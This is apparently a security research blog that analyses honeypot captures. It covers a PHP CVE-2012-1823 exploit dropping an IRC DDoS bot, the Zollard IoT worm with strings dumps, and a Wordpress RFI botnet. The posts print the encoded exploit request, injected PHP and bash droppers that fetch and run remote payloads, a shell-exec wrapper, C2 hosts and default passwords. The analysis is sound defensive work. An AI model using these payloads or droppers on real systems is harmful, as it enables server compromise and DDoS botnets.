Tuesday, July 8, 2014

Another Linux DDoS bot via CVE-2012-1823

If you run a web server, you should be very familiar with the PHP vulnerability classified as CVE-2012-1823.  Successful exploitation of this vulnerability allows a remote attacker to inject arbitrary code via command line options within the HTTP query string.  Unfortunately, there remain a large number of PHP servers that do not have this vulnerability patched, making them an ideal vehicle for acting as a DDoS bot.  

Our friends at MalwareMustDie have recently put up several excellent posts discussing Linux malware, particularly dealing with DDoS.  While they have covered a wide spectrum of Linux malware in the wild, it seems that new variants and bot infrastructures are continually being spun up.  We like to study and track these variants and infrastructures, as well as the payloads that are being injected.  In this case, one particular payload caught our eye.

In this case, the exploit attempt had URL encoding of:

POST //cgi-bin/php?%2d%64+%61%6c%6c%6f%77%5f%75%72%6c%5f%69%6e%63%6c%75%64%65%3d%6f%6e+%2d%64+%73%61%66%65%5f%6d%6f%64%65%3d%6f%66%66+%2d%64+%73%75%68%6f%73%69%6e%2e%73%69%6d%75%6c%61%74%69%6f%6e%3d%6f%6e+%2d%64+%64%69%73%61%62%6c%65%5f%66%75%6e%63%74%69%6f%6e%73%3d%22%22+%2d%64+%6f%70%65%6e%5f%62%61%73%65%64%69%72%3d%6e%6f%6e%65+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%64+%63%67%69%2e%66%6f%72%63%65%5f%72%65%64%69%72%65%63%74%3d%30+%2d%64+%63%67%69%2e%72%65%64%69%72%65%63%74%5f%73%74%61%74%75%73%5f%65%6e%76%3d%30+%2d%64+%61%75%74%6f%5f%70%72%65%70%65%6e%64%5f%66%69%6c%65%3d%70%68%70%3a%2f%2f%69%6e%70%75%74+%2d%6e HTTP/1.1
Content-Length: 188
Content-Type: application/x-www-form-urlencoded
Host: -h

When decoded, the actual URL is :

Decoded CVE-2012-1823 exploit attempt

Upon successful compromise, the attacker injects the following:

<? system("cd /tmp ; wget <redacted>.us.to/seed.jpg ; curl -O http://<redacted>.us.to/seed.jpg ; fetch http://<redacted>.us.to/seed.jpg ; tar -xzvf seed.jpg ; chmod +x seed ; ./seed ; rm -rf * "); ?>

seed.jpg" is actually a tar file, which when expanded reveals a bash script named "seed"

#!/bin/bash
cd /var/tmp/ ;wget <redacted>.us.to/index.htm; curl -O http://<redacted>.us.to/index.htm; fetch http://<redacted>.us.to/index.htm; tar -xzvf index.htm;rm -rf index.htm; perl /var/tmp/libssl3.so.2 ; rm -rf *; wget <redacted>.us.to/stats.php;fetch http://<redacted>.us.to/stats.php ;curl -O http://<redacted>.us.to/stats.php; tar -xzvf stats.php ; rm -rf stats.php ; cd .d ;./autorun

This script instructs the compromised server to fetch 'index.htm' from http://<redacted>.us.to. This again is a tar file, which when expanded, gives a file named "libssl3.so.2".  This file is actually a perl script called "DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team".  A copy of this popular IRCBot can be found at this PasteBin link.

Some of the configuration variables for the version of IrcBot dropped on our honeypots include:
$server = 'antiq.scifi.ro'
$server = 'antiq.evils.in'
my @admins = ("AnTiQ","deathy","Vasy");
my @hostauth = ("Qiss.users.undernet.org","Amadeo.users.undernet.org");
my @channels = ("#vnc");

The "seed' script also instructed our server to download "stats.php".  This was also a tar file, which when expanded, created a hidden directory named ".d" which contained the following files:

Contents of hidden 'd' subdirectory
The subdirectory "c" contained source files for port flooding routines.

Contents of 'c' subdirectory


Section of "Slashing SirVic's"flooding source code.

Two other files included in the "stats.php" tarball were of particular interest.  They are named "bang.txt" and "shiet.txt", and contain long lists of IP addresses and ports.  At this point, it's not clear what these lists represent, however "bang.txt" appears to contain many non-U.S addresses, notably weighted toward Romania.  "shiet.txt" contains a wide variety of IP addresses, representing many kinds of organizations, corporations, universities, and service providers.
After observing several DDoS attacks initiated by this infrastructure, we didn't note a correlation between these lists, and any attack victims.  We also did not yet observe any correlation between these lists and compromised hosts initiating DDoS attack traffic.

The contents of "bang.txt", broken out by ASN and Network name can be viewed from here: Link to "bang.txt"

The contents of "shiet.txt", broken out by ASN and Network name can be viewed from here:  Link to "shiet.txt"

Soon after the script downloads, our server joined the IRC on antiq.scifi.ro (195.182.159.51)

Bot joining C2 on antiq.scifi.ro
Not long after that, a command initiating a flood attack against 70.39.96.225 begins, and the compromised host begins sending fragmented UDP packets to the victim.


Bot being instructed to begin UDP flood to victim

Packet capture of UDP flood
We've observed this botnet as being very active, targeting a wide variety of victims.   While IRC botnets have been around for many years, the seeding and attack mechanisms continue to evolve.

Unpatched CMS, weak SSH passwords, as well as vulnerable PHP deployments remain a major weakspot in Internet facing servers.  It's pretty safe to say that if web site administrators do not perform a regular, stringent patch management program, it's just a matter of 'when', not 'if' they will be compromised.



Tuesday, December 3, 2013

Hey Zollard, leave my Internet of Things alone!

We've long been tracking exploit attempts against web servers, notably CMS hosts, ColdFusion, and vanilla PHP/CGI servers. Of late, we've observed a fairly large increase in PHP exploit attempts.  So Symantec's recent report about Linux.Darlloz targeting "The Internet of Things" was of particular interest.

Recently I noted an inbound PHP exploit attempt from 78.39.232.113 - Telecommunication Company of Kordestan - Iran

PHP exploit attempt from 78.39.232.113
The decoded POST is:

-d allow_url_include=%6Fn -d safe_mode=off -d suhosin%2Esimulation=on -d disable_fu%6Ections="" -d open_basedir=none -d auto_prepend_file=php:%2F/input -d cgi.force_redirec%74=0 -d cgi.redirect_status_env=0 -n

Note the User-Agent: Zollard and the reference to the files that will attempt to be to be executed upon successful compromise. The files indicate several architectures, arm, ppc, mips, mipsel, and x86.

All files were fetched, and the x86 file was sandboxed on a linux VM.  Immediately the VM began incrementally scanning 117.201.0.0/18 for open destination port 58455.  The linux malware also opened up a listener on my VM's port 58455.

Compromised host listening on port 58455

Upon finding a remote host listening on that port, the local host would initially send 0x00020015 and would receive one of several replies including, 0x010005, 0x01010006, or 0x01020006

Depending on the reply, the scanning host would then attempt a Telnet connection to the remote host that it had previously connected to on port 58445.  Examining strings of the malware files show several usernames that are attempted, including "root" and "admin"
Weak or non-existent passwords allow for a successful telnet login, with examples below:


Example of Telnet session to a BusyBox device

Example of Telnet session to ARM architecture device

As mentioned earlier, the malware files for the x86, arm, mips, mipsel, and ppc architectures were fetched.  You may find it of interest to see a strings dump of each of the files:


#EgvT2
@ #!
!1C "
V! 0
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/0.run
/var/1.run
/var/idhash
/var/response
/var/challenge
/var/b.arm_v5t
/var/b.arm_v6k
/var/f.arm_v5t
/var/f-t2.arm_v6k
/var/f-t2.mips
/var/f-t2.mipsel
/var/sp.arm_v5t
/var/sp.arm_v6k
/var/t2.arm_v6k
/var/readme
/var/b/b3.arm_v5t
/var/b/b3.arm_v6k
/var/b/b3.mips
/var/b/b3.ramips
/var/b/b3.rtl
/var/b/readme
/var/b/0.run
/var/b/1.run
/var/b/idhash
/dav/0.run
/dav/1.run
/dav/b3.arm_v5t
/dav/b3.arm_v6k
/dav/b3.mips
/dav/b3.rtl
/dav/idhash
/dav/readme
/var/b
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
Strings from 'arm' file
Strings from 'mips' file

/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.mips
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/var/tmp/ep2.mips
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.reginfo
.text
.rodata
.data.rel.ro
.data
.got
.sbss
.bss
.comment
.mdebug.abi32
.pdr
/proc/self/exe
nodes
POST
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
/bin/sh
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
ep2.ppc
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/var/run/z
reboot
#!/bin/sh
ls /bin/killall || ls /sbin/killall || ls /usr/bin/killall || ls /usr/sbin/killall || reboot
killall arm ppc mips mipsel
sleep 10
/var/run/.zollard/arm || /var/run/.zollard/ppc || /var/run/.zollard/mips || /var/run/.zollard/mipsel || reboot
GET / HTTP/1.1
Host:
mips
mipsel
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m
GYvh
QdV[3
y8G9
lQ\a< >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
admin
root
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.sbss
.bss
.comment
Strings from 'mipsel' file
Strings from 'ppc' file
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);
function myshellexec($cmd)
global $disablefunc;
$result = "";
if (!empty($cmd))
if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,"r")))
$result = "";
while(!feof($fp)) {$result .= fread($fp,1024);}
pclose($fp);
return $result;
myshellexec("wget -O /tmp/x86 http://www.gpharma.co/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd
nodes
/bin/sh
GET / HTTP/1.1
Host:
/proc
/proc/
/stat
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd
/var/run/.lightpid
/var/run/.aidrapid
/var/run/lightpid
/var/run/.lightscan
/var/run/lightscan
/var/run/mipsel
/var/run/mips
/var/run/sh
/var/run/arm
/var/run/ppc
/var/run/m
/var/run/mi
/var/run/s
/var/run/a
/var/run/p
/var/run/msx
/var/run/mx
/var/run/sx
/var/run/ax
/var/run/px
/var/run/32
/var/run/sel
/var/run/pid
/var/run/gcc
/var/run/dev
/var/run/psx
/var/run/mpl
/var/run/mps
/var/run/sph
/var/run/arml
/var/run/mips.l
/var/run/mipsell
/var/run/ppcl
/var/run/shl
/bin/pp
/bin/mi
/bin/mii
/var/tmp/dreams.install.sh
/var/tmp/ep2.ppc
/usr/bin/wget
/usr/bin/-wget
/cgi-bin/php
/cgi-bin/php5
/cgi-bin/php-cgi
/cgi-bin/php.cgi
/cgi-bin/php4
EHW:
p"XW
m >
echo -n >
&& echo -e \\x5A
mkdir -p
/var/run/.zollard/
chmod +x
cp /bin/sh
root
1234
12345
dreambox
smcadmin
0!0
SHA1
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
GCC: (GNU) 4.1.2
.shstrtab
.text
.rodata
.data
.bss
.comment
Strings from 'x86' file

So who is "Zollard"?  What is the relationship between the scanned targets and the original scanner?
There is a good deal more research to be done on this malware, as well as the hosting infrastructure supporting these exploit attempts.  At this point, we believe that the malware hosting location is a compromised host, and is not part of this campaign.

We recommend the blocking of IP address 78.39.232.113 and ensuring that all Internet facing devices, yes "devices" are strongly secured. 

Friday, August 9, 2013

List of malware pcaps, samples, and indicators for the Library of Malware Traffic Patterns

The library of malware traffic patterns have been popular. We found it very useful as well ourselves and we encourage you to send your contributions. I know at some point the spreadsheet will become unwieldy but I personally find it the most easy way (easy sort, search etc)

Currently, most of the samples described have the corresponding samples and pcaps available for download (email Mila @contagio for the password)
such as you see in the links below
http://bit.ly/crimesamples | http://bit.ly/crimepcaps
http://bit.ly/aptsampleshttp://bit.ly/aptpcaps


Email us at mila [a t ] Deependresearch.org or adimino [a t] deependresearch.org


The current list of malware described (as of Aug. 9, 2013)


#APTCRIME and HACKTIVISM
19002Adware Hotbar
Alina POS v5.3-6
29002 POSTAndromeda
3Banechant 1ArcomRat / Dokstormac
4Banechant payload dl 2Ardamax keylogger
5BeebusAsprox Checkin
6Beebus C2 checkinAsproxGET list of C2s
7Beebus data sendAsproxGETs spam template
8Comfoo / Vinself / MspubAvatar Rootkit
9Cookies /Cookiebag / DalbotBeebone downloader
10CoswidBitcoinminer
11CVE-2012-0754 SWF in DOCBlackhole 2
12CVE-2012-0779Blackhole v2
13DepyotBlazebot
14Destory Rat / Sogu / ThoperCarberp
15Disttrack / ShamoonCitadel
16DNSWatch / ProtuxCutwail / Pushdo
17Downloader BMPDarkmegi
18EinsteinDarkness DDos v8g
19Einstein data sendDirtJumper DDoS
20Enfal / LuridDNSChanger
21FavoritesEK - Blackhole 2 landing
22FoxyEK Blackhole 1
23Foxy CheckinEK Neutrino
24Gh0stEK Phoenix
EK Popads
25Gh0st ASP verFakeAV var (via Kuluoz - Asprox botnet)
26Gh0st PHP verFlashback OSX
27Gh0st v2000 varGameThief
28Gh0st varGapz C&C request
29GlassesGuntior - CN bootkit
30GoogleAdC2Gypthoy
31GoogleAdC2 2nd stageHiloti
32GooglesHOIC DDoS
33GreencatHorst Proxy
34GtalkImaut
35Hangover Smackdown MinaproIRCbot
36Hupigon / GraybirdJBOSS worm
37icon.js - system info sendKaragany Loader
38IEXPLORE Rat / C0D0S0 /Briba / Cimuz / SharkyRATKuluoz.B downloader
39IXESHEMatsnu - MBR wiping ransomware
40IXESHE AESMedfos
41KoreanBanker DLMoney loader
42Letsgo / TabMsgSQLMutopy Downloader
43Letsgo / TabMsgSQL downloaderMutopy Downloader initial callback
44LikseputPassAlert
45Lingbo (?)Pony loader
46Luckycat - WIMMIEPowerLoader
47LURKRanbyus / Triton (Spy, Banking, smart cards)
48Mediana ProxyReedum
49MiniASPShiz / Rohimafo DDoS
50MinidukeSrizbi
51MiniflameStabuniq
52MirageSweet Orange EK
53Mirage - later varSymmi Remote File Injector
54MongalTbot tor
55MSWab /YayihTinba aka Zusy
56MurcyUrausy (Ransomware)
57NetravlerUSteal.D
58NfLogVobfus
59NTESSESSXpaj
60Pitty TigerZeroAccess / Sirefef
61PlugxZeroAccess / Sirefef - Counter site checkin
62PNG trojanZeroAccess / Sirefef ppc fraud - redirect
63Poison IvyZeus
64QuarianZeus Gameover
65RedOctober AuthInfo
66RedOctober Sysinfo
67RegSubDat
68RssFeeder
69Sanny / Win32.Daws
70Seasalt
71Sofacy
72Surtr 2nd Stage DL
73Surtr Initial GET
74Swami
75Sykipot / Wyksol
76Taidoor
77Taleret
78Tapaoux
79Tarsip Eclipse
80Tarsip Moon
81Variant Letsgo / TabMsgSQL downloader (comment crew)
82Vinself
83WEBC2_RAVE
84WEBC2-Bolid
85WEBC2-Clover
86WEBC2-CSON
87WEBC2-CSON Response to commands
88WEBC2-HEAD
89WEBC2-Table
90Xtreme Rat

Friday, May 31, 2013

Under this rock... Vulnerable Wordpress/Joomla sites...

Overview of the RFI botnet malware arsenal

Exploits directed at Wordpress and/or Joomla content management systems(CMS) have been increasing at a dramatic rate over the past year. Internet blogs and forums are flooded with posts about hacked CMS installations. Popular jargon refers to the attackers as "hackers", but it is generally understood that these mass compromises are being performed via automated scanners and tools. However, we believe that there is not enough coverage of the actual malware involved.

One such infection scheme is essentially the following:

A downloader trojan  (Mutopy  - Win32) (20a6ebf61243b760dd65f897236b6ad3 Virustotal) instructs the infected host to download:
1) Remote File Injector "Symmi" (Win32) 7958f73daf4b84e3b00e008258ea2e7a Virustotal 
2) SDbot (Win32) - aaee52bfb589f6534c4b51e3b144dc08 Virustotal 
3) PHP scripts for injecting into compromised Wordpress sites. Among them a PHP spambot (victimized site owners often get alerted about copious amount of meds and spam porn emanating from their sites). This is also the source of varied links for spam using thousands of various links redirecting to the same sites (e.g. weightloss, work at home scams, or porn sites)

The "hackers" attacking the Wordpress servers are armies of compromised windows desktops continuously checking the C&C servers for the new targets. This is the reason why cleaned but not fully patched/secured sites get compromised over and over. It's trivial for a site owner to discover the malicious PHP script on their server. It's much less so to discover how their server was compromised in the first place.

This will be the first in a series of posts examining various CMS attacks and server compromises that DeepEnd Research continues to track.  In this post, we take a quick look at one such attack infrastructure.  Our goal in this first post is to simply raise awareness of the malware, domains and hosting providers used in this current attack.  At the time of this writing, the infrastructure is actively scanning and exploiting vulnerable sites.  With the prompt assistance of Afilias, the domains used in this infrastructure have since been taken down.

Executing this sample in a virtualized sandbox environment allowed for RAM to be easily captured, and subsequently analyzed using Volatility v2.2.  Examining the network connections active at the time of the RAM snapshot, we observe a number of outbound connections to remote sites on port 80.


Note that all but two outbound connections were created by conhost.exe (PID 3060), while mqtgsvc.exe (PID 2968) created the other two. Examining the process list, we see that PID 2968 is the parent of PID 3060, and both are active.


By examining the pcap, we learn that mqtgsvc.exe checks in with domain www.wholists.org 

Unpacked version of conhost.exe  7958F73DAF4B84E3B00E008258EA2E7A contains Base94 alphabet, which is being used for encoding strings and communication requests in addition to common Base64

 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~

Examining the pcap shows initial communication with 'www.wholists.org' on 95.163.104.69 - initial callback

POST /protocol.php?p=544355219&d=+ldPFacHQRWmAUMZtUAAHfFREUG1RAQdpWxDf6QFQhE= HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Content-Length: 782
User-Agent: -
Host: www.wholists.org
Connection: Keep-Alive
Cache-Control: no-cache

